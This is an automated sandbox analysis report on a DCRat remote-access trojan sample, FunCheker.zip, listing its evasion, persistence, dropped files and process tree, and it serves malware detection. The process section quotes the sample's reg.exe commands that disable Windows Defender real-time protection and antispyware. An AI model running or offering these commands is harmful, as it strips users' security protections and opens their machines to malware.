Malware Analysis Report

2024-11-15 05:53

Sample ID 240722-xwylbstbjc
Target FunCheker.zip
SHA256 0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9
Tags
dcrat evasion infostealer rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9

Threat Level: Known bad

The file FunCheker.zip was found to be: Known bad.

Malicious Activity Summary

dcrat evasion infostealer rat trojan

Process spawned unexpected child process

Modifies Windows Defender Real-time Protection settings

Modifies security service

DcRat

DCRat payload

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies registry class

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-22 19:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 19:12

Reported

2024-07-22 19:30

Platform

win7-20240704-en

Max time kernel

1050s

Max time network

725s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Windows Defender\es-ES\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Help\csrss.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\Help\886983d96e3d3e C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\L2Schemas\csrss.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\L2Schemas\886983d96e3d3e C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A
N/A N/A C:\Users\Default User\System.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default User\System.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 2444 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 2444 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 2444 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 2444 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1256 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1256 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1256 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2736 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2736 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2736 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

